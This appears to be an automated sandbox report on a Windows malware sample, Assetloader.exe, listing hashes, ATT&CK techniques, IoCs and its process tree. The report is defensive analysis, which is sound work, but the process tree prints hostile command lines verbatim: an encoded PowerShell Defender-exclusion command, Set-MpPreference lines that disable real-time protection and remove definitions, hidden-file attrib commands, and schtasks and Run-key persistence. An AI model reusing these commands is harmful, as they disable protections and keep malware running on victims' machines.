6a9b62894ee77e4131d0fbf4f43fe634e10c0c8ae616012a8e62a5047ba8b7a5

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
08/03/2024, 14:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Assetloader.exe
Size

9.5MB
MD5

824b1900fa0979a638e00b0aee1c32ea
SHA1

9621ce578f9561cb708f7806a5916970e1e012d1
SHA256

f3e1ed3f50fd06db77cd607b0bf4060ce1707a969fe27057ee33e1033437a761
SHA512

4c190f03dc0a0c713acc035ac199bcaba74a1aaa666aac47c582273e23cf97c59aacc49589230677003f3b6469228e70058b9690bcb527ec430f20dfb56486ca
SSDEEP

196608:L+k8xu3cwZhMWs+GGzLSHTqWdlmx0Q0Hbwq9xi/HX77r:jW8dGGi342Hkqm/Hr7

Score

8^/10

evasion persistence upx

Malware Config

Signatures

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1092	attrib.exe
4404	attrib.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation	Assetloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation	sr2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation	vr2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation	$77svrhost.exe

Executes dropped EXE 7 IoCs

pid	Process
2220	vr2.exe
4180	sr2.exe
1608	ug2.exe
3916	bg.exe
3272	bg.exe
4496	aids.exe
1892	$77svrhost.exe

Loads dropped DLL 18 IoCs

pid	Process
3272	bg.exe
3272	bg.exe
3272	bg.exe
3272	bg.exe
3272	bg.exe
3272	bg.exe
3272	bg.exe
3272	bg.exe
3272	bg.exe
3272	bg.exe
3272	bg.exe
3272	bg.exe
3272	bg.exe
3272	bg.exe
3272	bg.exe
3272	bg.exe
3272	bg.exe
3272	bg.exe

UPX packed file 38 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000700000002325b-123.dat	upx
behavioral2/files/0x000700000002325b-122.dat	upx
behavioral2/memory/3272-128-0x00007FFE29100000-0x00007FFE296E8000-memory.dmp	upx
behavioral2/files/0x0007000000023228-131.dat	upx
behavioral2/files/0x0007000000023259-133.dat	upx
behavioral2/memory/3272-136-0x00007FFE40450000-0x00007FFE40474000-memory.dmp	upx
behavioral2/memory/3272-181-0x00007FFE42AC0000-0x00007FFE42ACF000-memory.dmp	upx
behavioral2/files/0x000700000002325a-178.dat	upx
behavioral2/files/0x0007000000023258-177.dat	upx
behavioral2/memory/3272-205-0x00007FFE3CB70000-0x00007FFE3CB9D000-memory.dmp	upx
behavioral2/memory/3272-207-0x00007FFE38960000-0x00007FFE38983000-memory.dmp	upx
behavioral2/memory/3272-210-0x00007FFE40560000-0x00007FFE4056D000-memory.dmp	upx
behavioral2/memory/3272-209-0x00007FFE3CB30000-0x00007FFE3CB49000-memory.dmp	upx
behavioral2/memory/3272-211-0x00007FFE33770000-0x00007FFE3379E000-memory.dmp	upx
behavioral2/memory/3272-208-0x00007FFE277D0000-0x00007FFE27943000-memory.dmp	upx
behavioral2/memory/3272-217-0x00007FFE27390000-0x00007FFE27705000-memory.dmp	upx
behavioral2/memory/3272-219-0x00007FFE27270000-0x00007FFE2738C000-memory.dmp	upx
behavioral2/memory/3272-218-0x00007FFE3D3A0000-0x00007FFE3D3AD000-memory.dmp	upx
behavioral2/memory/3272-222-0x00007FFE3C5B0000-0x00007FFE3C5C4000-memory.dmp	upx
behavioral2/memory/3272-226-0x00007FFE29100000-0x00007FFE296E8000-memory.dmp	upx
behavioral2/memory/3272-216-0x00007FFE27710000-0x00007FFE277C8000-memory.dmp	upx
behavioral2/memory/3272-206-0x00007FFE3CB50000-0x00007FFE3CB69000-memory.dmp	upx
behavioral2/memory/3272-251-0x00007FFE29100000-0x00007FFE296E8000-memory.dmp	upx
behavioral2/memory/3272-253-0x00007FFE42AC0000-0x00007FFE42ACF000-memory.dmp	upx
behavioral2/memory/3272-254-0x00007FFE3CB70000-0x00007FFE3CB9D000-memory.dmp	upx
behavioral2/memory/3272-257-0x00007FFE277D0000-0x00007FFE27943000-memory.dmp	upx
behavioral2/memory/3272-258-0x00007FFE3CB30000-0x00007FFE3CB49000-memory.dmp	upx
behavioral2/memory/3272-259-0x00007FFE40560000-0x00007FFE4056D000-memory.dmp	upx
behavioral2/memory/3272-256-0x00007FFE38960000-0x00007FFE38983000-memory.dmp	upx
behavioral2/memory/3272-255-0x00007FFE3CB50000-0x00007FFE3CB69000-memory.dmp	upx
behavioral2/memory/3272-252-0x00007FFE40450000-0x00007FFE40474000-memory.dmp	upx
behavioral2/memory/3272-260-0x00007FFE33770000-0x00007FFE3379E000-memory.dmp	upx
behavioral2/memory/3272-261-0x00007FFE27710000-0x00007FFE277C8000-memory.dmp	upx
behavioral2/memory/3272-262-0x00007FFE27390000-0x00007FFE27705000-memory.dmp	upx
behavioral2/memory/3272-264-0x00007FFE3D3A0000-0x00007FFE3D3AD000-memory.dmp	upx
behavioral2/memory/3272-263-0x00007FFE3C5B0000-0x00007FFE3C5C4000-memory.dmp	upx
behavioral2/memory/3272-265-0x00007FFE40450000-0x00007FFE40474000-memory.dmp	upx
behavioral2/memory/3272-267-0x00007FFE27270000-0x00007FFE2738C000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\svrhost\\$77svrhost.exe\""	sr2.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
101	discord.com
102	discord.com

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

pid	Process
4180	sr2.exe
2220	vr2.exe
1608	ug2.exe
2220	vr2.exe
4180	sr2.exe
1608	ug2.exe
4496	aids.exe
4496	aids.exe
1892	$77svrhost.exe
1892	$77svrhost.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\vr2.exe	Assetloader.exe
File created	C:\Windows\sr2.exe	Assetloader.exe
File created	C:\Windows\ug2.exe	Assetloader.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5100	schtasks.exe
3096	schtasks.exe
3932	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
5064	timeout.exe
1012	timeout.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
2056	tasklist.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2704	powershell.exe
2704	powershell.exe
2704	powershell.exe
4520	powershell.exe
4520	powershell.exe
1276	powershell.exe
1276	powershell.exe
4520	powershell.exe
1276	powershell.exe
4180	sr2.exe
4180	sr2.exe
4180	sr2.exe
4180	sr2.exe
4180	sr2.exe
4180	sr2.exe
4180	sr2.exe
4180	sr2.exe
4180	sr2.exe
4180	sr2.exe
4180	sr2.exe
4180	sr2.exe
4180	sr2.exe
4180	sr2.exe
2220	vr2.exe
2220	vr2.exe
4180	sr2.exe
4180	sr2.exe
4180	sr2.exe
4180	sr2.exe
4180	sr2.exe
4180	sr2.exe
2220	vr2.exe
2220	vr2.exe
4180	sr2.exe
4180	sr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
4180	sr2.exe
4180	sr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
2220	vr2.exe
4496	aids.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	2220	vr2.exe
Token: SeDebugPrivilege	1608	ug2.exe
Token: SeIncreaseQuotaPrivilege	4944	WMIC.exe
Token: SeSecurityPrivilege	4944	WMIC.exe
Token: SeTakeOwnershipPrivilege	4944	WMIC.exe
Token: SeLoadDriverPrivilege	4944	WMIC.exe
Token: SeSystemProfilePrivilege	4944	WMIC.exe
Token: SeSystemtimePrivilege	4944	WMIC.exe
Token: SeProfSingleProcessPrivilege	4944	WMIC.exe
Token: SeIncBasePriorityPrivilege	4944	WMIC.exe
Token: SeCreatePagefilePrivilege	4944	WMIC.exe
Token: SeBackupPrivilege	4944	WMIC.exe
Token: SeRestorePrivilege	4944	WMIC.exe
Token: SeShutdownPrivilege	4944	WMIC.exe
Token: SeDebugPrivilege	4944	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4944	WMIC.exe
Token: SeRemoteShutdownPrivilege	4944	WMIC.exe
Token: SeUndockPrivilege	4944	WMIC.exe
Token: SeManageVolumePrivilege	4944	WMIC.exe
Token: 33	4944	WMIC.exe
Token: 34	4944	WMIC.exe
Token: 35	4944	WMIC.exe
Token: 36	4944	WMIC.exe
Token: SeDebugPrivilege	2056	tasklist.exe
Token: SeDebugPrivilege	4520	powershell.exe
Token: SeIncreaseQuotaPrivilege	4944	WMIC.exe
Token: SeSecurityPrivilege	4944	WMIC.exe
Token: SeTakeOwnershipPrivilege	4944	WMIC.exe
Token: SeLoadDriverPrivilege	4944	WMIC.exe
Token: SeSystemProfilePrivilege	4944	WMIC.exe
Token: SeSystemtimePrivilege	4944	WMIC.exe
Token: SeProfSingleProcessPrivilege	4944	WMIC.exe
Token: SeIncBasePriorityPrivilege	4944	WMIC.exe
Token: SeCreatePagefilePrivilege	4944	WMIC.exe
Token: SeBackupPrivilege	4944	WMIC.exe
Token: SeRestorePrivilege	4944	WMIC.exe
Token: SeShutdownPrivilege	4944	WMIC.exe
Token: SeDebugPrivilege	4944	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4944	WMIC.exe
Token: SeRemoteShutdownPrivilege	4944	WMIC.exe
Token: SeUndockPrivilege	4944	WMIC.exe
Token: SeManageVolumePrivilege	4944	WMIC.exe
Token: 33	4944	WMIC.exe
Token: 34	4944	WMIC.exe
Token: 35	4944	WMIC.exe
Token: 36	4944	WMIC.exe
Token: SeDebugPrivilege	1276	powershell.exe
Token: SeIncreaseQuotaPrivilege	2916	wmic.exe
Token: SeSecurityPrivilege	2916	wmic.exe
Token: SeTakeOwnershipPrivilege	2916	wmic.exe
Token: SeLoadDriverPrivilege	2916	wmic.exe
Token: SeSystemProfilePrivilege	2916	wmic.exe
Token: SeSystemtimePrivilege	2916	wmic.exe
Token: SeProfSingleProcessPrivilege	2916	wmic.exe
Token: SeIncBasePriorityPrivilege	2916	wmic.exe
Token: SeCreatePagefilePrivilege	2916	wmic.exe
Token: SeBackupPrivilege	2916	wmic.exe
Token: SeRestorePrivilege	2916	wmic.exe
Token: SeShutdownPrivilege	2916	wmic.exe
Token: SeDebugPrivilege	2916	wmic.exe
Token: SeSystemEnvironmentPrivilege	2916	wmic.exe
Token: SeRemoteShutdownPrivilege	2916	wmic.exe
Token: SeUndockPrivilege	2916	wmic.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4496	aids.exe
1892	$77svrhost.exe

Suspicious use of WriteProcessMemory 61 IoCs

description	pid	Process	procid_target
PID 688 wrote to memory of 2704	688	Assetloader.exe	88
PID 688 wrote to memory of 2704	688	Assetloader.exe	88
PID 688 wrote to memory of 2704	688	Assetloader.exe	88
PID 688 wrote to memory of 2220	688	Assetloader.exe	90
PID 688 wrote to memory of 2220	688	Assetloader.exe	90
PID 688 wrote to memory of 4180	688	Assetloader.exe	91
PID 688 wrote to memory of 4180	688	Assetloader.exe	91
PID 688 wrote to memory of 1608	688	Assetloader.exe	92
PID 688 wrote to memory of 1608	688	Assetloader.exe	92
PID 688 wrote to memory of 3916	688	Assetloader.exe	93
PID 688 wrote to memory of 3916	688	Assetloader.exe	93
PID 3916 wrote to memory of 3272	3916	bg.exe	94
PID 3916 wrote to memory of 3272	3916	bg.exe	94
PID 3272 wrote to memory of 2356	3272	bg.exe	95
PID 3272 wrote to memory of 2356	3272	bg.exe	95
PID 3272 wrote to memory of 4320	3272	bg.exe	96
PID 3272 wrote to memory of 4320	3272	bg.exe	96
PID 3272 wrote to memory of 2452	3272	bg.exe	99
PID 3272 wrote to memory of 2452	3272	bg.exe	99
PID 3272 wrote to memory of 2744	3272	bg.exe	101
PID 3272 wrote to memory of 2744	3272	bg.exe	101
PID 2744 wrote to memory of 4944	2744	cmd.exe	103
PID 2744 wrote to memory of 4944	2744	cmd.exe	103
PID 2452 wrote to memory of 2056	2452	cmd.exe	104
PID 2452 wrote to memory of 2056	2452	cmd.exe	104
PID 4320 wrote to memory of 1276	4320	cmd.exe	105
PID 4320 wrote to memory of 1276	4320	cmd.exe	105
PID 2356 wrote to memory of 4520	2356	cmd.exe	106
PID 2356 wrote to memory of 4520	2356	cmd.exe	106
PID 1608 wrote to memory of 2916	1608	ug2.exe	111
PID 1608 wrote to memory of 2916	1608	ug2.exe	111
PID 4180 wrote to memory of 4404	4180	sr2.exe	118
PID 4180 wrote to memory of 4404	4180	sr2.exe	118
PID 4180 wrote to memory of 1092	4180	sr2.exe	120
PID 4180 wrote to memory of 1092	4180	sr2.exe	120
PID 2220 wrote to memory of 1248	2220	vr2.exe	122
PID 2220 wrote to memory of 1248	2220	vr2.exe	122
PID 2220 wrote to memory of 3572	2220	vr2.exe	124
PID 2220 wrote to memory of 3572	2220	vr2.exe	124
PID 1248 wrote to memory of 5100	1248	cmd.exe	126
PID 1248 wrote to memory of 5100	1248	cmd.exe	126
PID 3572 wrote to memory of 1012	3572	cmd.exe	127
PID 3572 wrote to memory of 1012	3572	cmd.exe	127
PID 3572 wrote to memory of 4496	3572	cmd.exe	129
PID 3572 wrote to memory of 4496	3572	cmd.exe	129
PID 4180 wrote to memory of 4544	4180	sr2.exe	133
PID 4180 wrote to memory of 4544	4180	sr2.exe	133
PID 4544 wrote to memory of 5064	4544	cmd.exe	135
PID 4544 wrote to memory of 5064	4544	cmd.exe	135
PID 4544 wrote to memory of 1892	4544	cmd.exe	138
PID 4544 wrote to memory of 1892	4544	cmd.exe	138
PID 1892 wrote to memory of 4320	1892	$77svrhost.exe	140
PID 1892 wrote to memory of 4320	1892	$77svrhost.exe	140
PID 1892 wrote to memory of 3096	1892	$77svrhost.exe	142
PID 1892 wrote to memory of 3096	1892	$77svrhost.exe	142
PID 1892 wrote to memory of 908	1892	$77svrhost.exe	144
PID 1892 wrote to memory of 908	1892	$77svrhost.exe	144
PID 1892 wrote to memory of 2376	1892	$77svrhost.exe	146
PID 1892 wrote to memory of 2376	1892	$77svrhost.exe	146
PID 1892 wrote to memory of 3932	1892	$77svrhost.exe	148
PID 1892 wrote to memory of 3932	1892	$77svrhost.exe	148

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1092	attrib.exe
4404	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Assetloader.exe
"C:\Users\Admin\AppData\Local\Temp\Assetloader.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:688
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAaQByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAagBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAagB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAZQBpACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2704
- C:\Windows\vr2.exe
  "C:\Windows\vr2.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2220
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "aids" /tr '"C:\Users\Admin\AppData\Roaming\aids.exe"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1248
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "aids" /tr '"C:\Users\Admin\AppData\Roaming\aids.exe"'
      4⤵
      Creates scheduled task(s)
      PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp64A5.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3572
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1012
  - - C:\Users\Admin\AppData\Roaming\aids.exe
      "C:\Users\Admin\AppData\Roaming\aids.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:4496
- C:\Windows\sr2.exe
  "C:\Windows\sr2.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4180
- - C:\Windows\System32\attrib.exe
    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\svrhost"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4404
- - C:\Windows\System32\attrib.exe
    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\svrhost\$77svrhost.exe"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB2A6.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4544
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:5064
  - - C:\Users\Admin\svrhost\$77svrhost.exe
      "C:\Users\Admin\svrhost\$77svrhost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1892
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77svrhost.exe
        5⤵
        
        PID:4320
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /Create /SC ONCE /TN "$77svrhost.exe" /TR "C:\Users\Admin\svrhost\$77svrhost.exe \"\$77svrhost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:3096
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77svrhost.exe
        5⤵
        
        PID:908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
        5⤵
        
        PID:2376
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "svrhost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
        5⤵
        Creates scheduled task(s)
        
        PID:3932
- C:\Windows\ug2.exe
  "C:\Windows\ug2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1608
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2916
- C:\Users\Admin\AppData\Roaming\bg.exe
  "C:\Users\Admin\AppData\Roaming\bg.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3916
- - C:\Users\Admin\AppData\Roaming\bg.exe
    "C:\Users\Admin\AppData\Roaming\bg.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bg.exe'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2356
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bg.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4520
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4320
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1276
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2452
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2744
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4944

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1128

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI39162\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39162\_ctypes.pyd

Filesize
57KB

MD5
38fb83bd4febed211bd25e19e1cae555

SHA1
4541df6b69d0d52687edb12a878ae2cd44f82db6

SHA256
cd31af70cbcfe81b01a75ebeb2de86079f4cbe767b75c3b5799ef8b9f0392d65

SHA512
f703b231b675c45accb1f05cd34319b5b3b7583d85bf2d54194f9e7c704fbcd82ef2a2cd286e6a50234f02c43616fbeccfd635aefd73424c1834f5dca52c0931

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39162\api-ms-win-core-console-l1-1-0.dll

Filesize
21KB

MD5
604f8220d6e9bbfe13cf30d90430eb5e

SHA1
d756339808307f2dde9a264a60064c12f929fe37

SHA256
08965604253d019b90cff21c35d98d6276561f213c0e373212fe994beadfe47f

SHA512
6f2394075e1b56eec4163cc42fa4f4882eb51959fe41e468f978a815814caa742f29e7d70683398105a4a8f9d06fa2a883b1c38625c7afd660961f8ca2175032

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39162\api-ms-win-core-datetime-l1-1-0.dll

Filesize
22KB

MD5
a08e9d074407ce657135583dd46b7ef8

SHA1
5566b9167679cea09a369464f82fd3450547eae2

SHA256
6a3a71ea739c19e3557529b084d627af8d5b654de391437c00cbb48fbf01e180

SHA512
a9f750c7a8c26fa7e3943be77ba0b10cf8418d7ae99e2e4ec0b28c45064fd7a2884c59149e9f19ffc5da77b996ec97b6db9b5cbb2dfcaf6dda37d73d33468b8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39162\api-ms-win-core-debug-l1-1-0.dll

Filesize
22KB

MD5
4bd922d8bd84b87909a14eff013b5fa2

SHA1
5d7ece4b82db230ef90e7f0b7f07d51259506380

SHA256
0c0632c396a53aac5bb8eef885c5ec745ec92a810925c8710590aff6eaf1817c

SHA512
a416e09d9607381d791249528abb96fb0112a555eb56ed9c80b74ea16926e26a68944256d4895705c78e65be4897ea514138f0480ea450d86588f99002e84e1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39162\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
22KB

MD5
4d8fd1ff9959d8230270928301c58cdd

SHA1
1bc22a0917b0a2349419cc8fce5f357e2d9ba00a

SHA256
1c32d309a6c4f66ed5953d64c669d09e4efb6adf3d0aad8365ef855c1cb61894

SHA512
dc9c7fb2df20d09ed249414f9cafbce6ecd2025de7928ddb8dfde77e9a54c3451196f4a007530ca2f20e091b59bb09428b832f3ea7b46b3c426e208217b4f301

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39162\api-ms-win-core-fibers-l1-1-0.dll

Filesize
21KB

MD5
c935583504d1854a516eb336b60f1436

SHA1
8f7fe35214b991c8b37ae35bcfbb551e4f20184f

SHA256
de86f0cd5a813192164b7970a252d6287918202a786f014110399cfa5c9d4528

SHA512
b6323318bc5b57d2e9a43ee0064e221593b90073f57b1cc2d3bfd48c07a7454969ca26ad51b9b0d3503619d09f96ccb263509da37595ddebd74441c0eb0b5b13

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39162\api-ms-win-core-file-l1-1-0.dll

Filesize
26KB

MD5
1c54f3edf48d7d5cd20ae8083345c4eb

SHA1
977ffa32bc40b21052f3431572617377866a4552

SHA256
7a445bdc8b67741b583c32084bdaf8113e9edee6a15abdec325e1b879fa26e6f

SHA512
cf9770115d3a59e10d7628e9b660830f4aedd5dcce29e6e13c63a32ab928d7b4f8131332791e106d9229ffc90d299b61a9bc7e134c17d69f3b90266ddcd46fbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39162\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
0d6d4654c98caa8ff93eebbc744bfb8b

SHA1
e4662e675a2ae93e66bddb0743fb81c0cf1e31d4

SHA256
1686b1b0a72655c89348bd5a2e5c88e6e5ca228f407c02f9700b43a045e60aab

SHA512
db3d59af607e9428b646b8993547b1129e92bb1aad12684cd69c0050517f6d8a1832393323c7f99d0b1dfa6ae801c8921234a3e470063b6715435e99e0b03ae6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI39162\api-ms-win-core-file-l2-1-0.dll

Filesize
21KB

MD5
7daa81e752613950b67903f4ea69a0da

SHA1
00f86240d69e15a9e319e4c79026b54edc3ea671

SHA256
e255d1b403a48dd600b58d2124e7ceaf2edc6ca0448096f4160d85dd3e38c6a3

SHA512
